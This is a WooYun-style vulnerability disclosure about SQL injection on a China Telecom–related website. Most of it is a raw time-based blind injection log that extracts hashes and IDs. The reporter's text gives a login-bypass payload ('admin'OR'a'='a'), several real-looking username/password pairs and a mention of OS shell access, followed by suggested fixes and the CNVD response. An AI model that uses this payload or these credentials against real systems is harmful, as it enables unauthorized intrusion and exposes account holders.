[21:26:50] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:28:46] [INFO] retrieved: ??窘
[21:30:20] [INFO] retrieved: 10007
[21:30:47] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:32:43] [INFO] retrieved: 桔?蝥
[21:34:14] [INFO] retrieved: 10008
[21:34:42] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:36:38] [INFO] retrieved: ?繧
[21:37:39] [INFO] retrieved: 10009
[21:38:05] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:40:01] [INFO] retrieved: ???
[21:41:31] [INFO] retrieved: 1001
[21:41:50] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:43:47] [INFO] retrieved: 恬?羕
[21:45:19] [INFO] retrieved: 10010
[21:45:44] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:47:42] [INFO] retrieved: ??酎
[21:49:09] [INFO] retrieved: 10011
[21:49:31] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:51:28] [INFO] retrieved: ?婓?
[21:52:57] [INFO] retrieved: 10012
[21:53:20] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:55:17] [INFO] retrieved: 桔蝥乓
[21:56:51] [INFO] retrieved: 10013
[21:57:14] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[21:59:09] [INFO] retrieved: 桧?艙
[22:00:41] [INFO] retrieved: 10014
[22:01:05] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[22:03:01] [INFO] retrieved: ??A
[22:04:04] [INFO] retrieved: 10015
[22:04:27] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[22:06:24] [INFO] retrieved: ??
[22:07:21] [INFO] retrieved: 10016
[22:07:45] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[22:09:47] [INFO] retrieved: 腨?瑑
[22:11:18] [INFO] retrieved: 10017
[22:11:42] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[22:13:38] [INFO] retrieved: ??
[22:14:41] [INFO] retrieved: 10018
[22:15:06] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[22:17:02] [INFO] retrieved: 譳??
[22:18:33] [INFO] retrieved: 10019
[22:18:56] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[22:20:53] [INFO] retrieved: 打?獞
[22:22:25] [INFO] retrieved: 1002
[22:22:45] [INFO] retrieved: ZwsUcorZkCrsujLiL6T
[22:24:22] [ERROR] invalid character detected. retrying..
[22:24:22] [WARNING] increasing time delay to 2 seconds
2vQ==
[22:25:03] [INFO] retrieved: 譳??
[22:27:47] [INFO] retrieved: 10020
[22:28:33] [INFO] retrieved: 9bsMjeFGxntEurv05lhMwA==
[22:32:02] [INFO] retrieved: ?噻
[22:34:01] [INFO] retrieved: 10021
[22:34:41] [INFO] retrieved: KzyjYTKVUC5TT9hgBo0yGw==
[22:38:06] [INFO] retrieved: 譳?灧
[22:40:50] [INFO] retrieved: 10022
[22:41:32] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2
[22:44:34] [ERROR] invalid character detected. retrying..
[22:44:34] [WARNING] increasing time delay to 3 seconds
vQ==
[22:45:24] [INFO] retrieved: 桧??
[22:49:25] [INFO] retrieved: 10023
[22:50:25] [INFO] retrieved: ZwsUcorZkCrsujLiL6T2vQ==
[22:55:22] [INFO] retrieved: 奏規
[22:58:05] [INFO] retrieved: 10024
[22:59:08] [INFO] retrieved:
[22:59:21] [ERROR] invalid character detected. retrying..
[22:59:21] [WARNING] increasing time delay to 4 seconds
ZwsUcorZ
这个破延时注入我跑了一下午。
随便找个
18979770009/05107510
system/000000
test/test
admin'OR'a'='a/000000
也可以os shell

tyutyu.jpg


cvbcvb.jpg


dump出来的。

asdasd.jpg

修复方案:

1,过滤再过滤。
2,数据库降权
3,我在系统内部也发现了大量注入
4,我发现了大量弱口令000000(虽然用户名是手机卡但是也不应该)

版权声明:转载请注明来源 陆由乙@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-09-10 17:35

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论